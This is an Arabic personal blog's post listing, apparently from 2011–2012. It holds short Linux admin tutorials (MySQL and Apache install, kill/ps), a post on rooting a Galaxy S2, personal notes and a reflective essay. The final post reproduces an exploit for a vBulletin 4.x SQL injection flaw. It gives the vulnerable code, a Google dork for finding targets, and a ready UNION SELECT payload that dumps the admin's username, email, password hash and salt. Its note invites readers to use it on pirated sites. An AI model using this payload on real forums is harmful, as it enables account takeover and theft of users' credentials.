شرح تركيب سيرفر قواعد بيانات على ديبيان

أغسطس 18, 2012 أضف تعليق

 

سلام عليكم شباب … عيد سعيد اعاده الله عليكم بالخير والبركة

اليوم احببت ان اكتب موضوع عن تركيب سيرفر قواعد بيانات على توزيعة ديبيان

اول شيء نفذ امر

” apt-get install mysql-server-5.1 ”

من ثم اضغط Y

قراءة المزيد…

التصنيفات :GUN/Luinx

كيفية ايقاف البرامج المفعلة في سيرفرات لينكس

أغسطس 16, 2012 أضف تعليق

سلام عليكم

اليوم سوف اشرح كيفية التعامل مع سكربت امر kill في انظمة لينكس
وظيفة الامر هو ايقاف الخدمات او البرامج على السيرفر .. ولعرض جميع العمليات النشطة

طبق امر ” ps -ax”

 

قراءة المزيد…

التصنيفات :GUN/Luinx

تركيب الرووت على Samsung Galaxy s2

مايو 28, 2012 2تعليقان


مساء الخير  شباب ؟  

كيف الحال ؟ اتمنى ان يكون الجميع بخير ايضا مضى وقت طويل على عدم التدوين والسبب هو بعض الضروف الشخصية التي اخرجتني عن كثير من الامور لا داعي لذكرها اليوم رجعت لكم بتدوينة شيقة وجميلة وهي عن محبوب الكل Android  وهو كيفية تركيب خاصية الـ ROOT او ما يسمى في الاجهزة بالسوبر يوزر … كثير من الايام اشاهد شروحات طويلة وعريضة عن تركيب صلاحيات رووت لاجهزة الموبايل التي تحمل انظمة اندرويد وبما اني املك جهاز جالاكسي اس 2 ونظام انرويد .!!! :d بعد البحث في الانترنت عن طريقة مختصرة لتركيب الرووت وجت برنامج سهل وبسيط جدا وهو برنامج يساعدك على تركيب الرووت بضغطة رز .!!! امر جميل صحيح ؟ اسم البرنامج هو UNLOOCK ROOT

قراءة المزيد…

التصنيفات :My M1nd#

شيء جديد :P

مارس 4, 2012 أضف تعليق

 

صباح الخير زوار المدونة الكرام 🙂

الصراحة عندما دخلت الى لوحة التحكم وقمت بكتابة هذه التدوينة احس بشيء جديد هههههههه المعنى اني احس بأشتياق شديد للمدونة

وانقطعت عن المدونة لفترة طويلة وهي بسبب العمل والدراسة واكملت الدراسة والان في العمل وبعد فترة ارجع للدراسة والحيااااااااااااااااااااااااااة (صعبة قليلاً) 😦

 

قبل اسبوع او اكثر قمت بشراء دومين خاص بـ اسم المدونة وسوف يكون securitymind.me

سوف اقوم بنقل الباك اب الى المدونة الجديدة وسيتم ترتيب كل شيء …والصراحة سوف يكون طعم جديد للتدوين قريبا لان تم توفير الكثير من الاوبشنز افضل من المدونة المجانية

وهي بسببها تواجهني صعوبات كثيرة في التدوين…..

قريبا سوف نعود وبقوة وبتدوينات جميلة وبفريق عمل رائع

تحياتي Seucirty-Mind

 

التصنيفات :My M1nd#

العزلة

أكتوبر 25, 2011 أضف تعليق

العزلة 🙂

سمعت أول مرة بمصطلح ( العزلة الشعورية ) من خلال كتابات الشهيد سيد قطب رحمه الله ، والعزلة الشعورية تعني ، أن تنعزل مشاعر الإنسان عن الجو المحيط به ، بمعنى أن الإنسان يكون في مكان ما بجسده فقط لكن مشاعره تكون في مكان آخر تماما .

وقد طُرح هذه المصطلح في سياق مختلف عن السياق الذي أتحدث فيه الآن ليس هذا مجال بحثه ، لكن أود أن أشير إلى أن العزلة الشعورية أمر يتعلمه الإنسان ويتدرب عليه حتى يتقنه فهو أمر مكتسب ، أو على الأقل هكذا قدّم هذا المصطلح … ولكن وجدت أن العزلة الشعورية أحيانا تُفرض على الإنسان فرضا ولو لم يحاول أن يتحلى بها ، يظهر مما سبق أن العزلة الشعورية حاجة استثنائية يلجأ إليها الإنسان لظروف معينة مختلفة .

المفارقة أنني علمت بأحيان يكون فيها الواقع هو الاستثناء ومشاعر هذا الجو الواقع هي الطارئة على قلب الإنسان وأحاسيسه ، لقد رأيت أن الإنسان أحيانا يلجأ إلى الواقع هاربا من وطأة أحاسيسه ومشاعره ، في عملية عكسية لما يفرضه مصطلح ( العزلة الشعورية ) .

أظن أن الإنسان التي تضطره مشاعره وأحاسيسه للهرب منها يكون قد بلغ منه الجهد مبلغا شديدا ، يتبادر لقارئ هذه الكلمات أن الإنسان الهارب من مشاعره قد هرب من ذكريات أليمه ومواقف جارحة توعز لتلك المشاعر بأن تستحوذ على القلب وتشد من أثقالها عليه ، لكن ما هذا قصدت ، بل الذي أتحدث عنه هو العكس تماما ، الذي أتحدث عنه هو أن يحاول الإنسان أن يهرب من مشاعره الجميلة وذكرياته الحالمة التي كانت في يوم من الأيام هي زهرة حياته بل هي حياته .

لقد اكتشفت أن للعزلة الشعورية معانٍ ما كنت أود اكتشافها أو حتى التفكير فيها ، ولكن ربما استطاع الإنسان يوما أن يطور من أسلوب تعامله مع مشاعره وأن يتكيّف معها وإن اشتدت عليه أو على الأقل …..يستسلم لها .

التصنيفات :My M1nd#

شرح تثبيت السيرفر الشخصي وكل ملحقاته عن نظام Ubuntu

سبتمبر 23, 2011 4تعليقات

السلام عليكم .. اليوم موضوع بسيط ومسلي للذين يتسخدمون انظمة لينكس كبداية لهم او بمعنى اصح مبتدئين على

نظام لينكس .!! شيء اكيد لا يعرفون كيف تنصيب بعض الاداوت المهم  اليوم سوف اشرح كيفية تنصيب اباتشي

سيرفر على اوبنتو

اول افتح التيرمنال ونفذ الامر
sudo apt-get install apache2

عندما يكتمل كل شيء عليك فحص الاباتشي قد تم تنصيبه بنجاح او يوجد فيه مشاكل افتح متصفحك واكتب عنوان

سيرفر الاباشتي الافتراضي الذي هو
http://localhost
اذا رأيت جملة في المتصفح هي
“It works!”
هذا يعني ان الاباشتي قد تم تنصيبه بنجاح عمل جيد 😉
وفي نهاية التصميم اذا رأيت هذا مثل هذا المسج

“Could not reliably determine the server’s fully qualified

domain name, using 127.0.1.1 for ServerName“.

تقد ان تصلح الخطأ عن اتبع الاوامر الذي سوف انفذها
gksu gedit /etc/apache2/conf.d/fqdn
قراءة المزيد…

التصنيفات :GUN/Luinx

Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability

سبتمبر 22, 2011 تعليق واحد

print?
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S
# Software Link: [[url]http://www.vbulletin.com/][/url]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [[url]http://members.vbulletin.com/][/url]

######################################################################################################

Vulnerability:
######################################################################################################

Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter “&messagegroupid” due to improper input validation.

#####################################################################################################
Vulnerable Code:
#####################################################################################################

File: /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid

if ($registry->GPC_exists[‘messagegroupid’] AND count($registry->GPC[‘messagegroupid’]) > 0)

{

$value = $registry->GPC[‘messagegroupid’];

if (!is_array($value))

{

$value = array($value);

}

if (!(in_array(‘ ‘,$value) OR in_array(”,$value)))

{

if ($rst = $vbulletin->db->query_read(“

SELECT socialgroup.name

FROM ” . TABLE_PREFIX.”socialgroup AS socialgroup

—> WHERE socialgroup.groupid IN (” . implode(‘, ‘, $value) .”)”)

}

############################################################################################
Exploitation:
############################################################################################
Post data on: –>search.php?search_type=1
–> Search Single Content Type

Keywords : Valid Group Message

Search Type : Group Messages

Search in Group : Valid Group Id

&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

##########################################################################################
More Details:
##########################################################################################

http://www.garage4hackers.com/showthread.php?1177-Vbulletin-4.0.x-gt-4.1.3-(messagegroupid)-SQL-injection-Vulnerability-0-day

###########################################################################################
Note:
###########################################################################################

Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as it was reported to them by altex, hence
customers are safe except those lowsy Admins. And this bug is for people to play with the many Nulled VB sites out there. ” Say No to Piracy Disclosure “.

التصنيفات :Exp1oits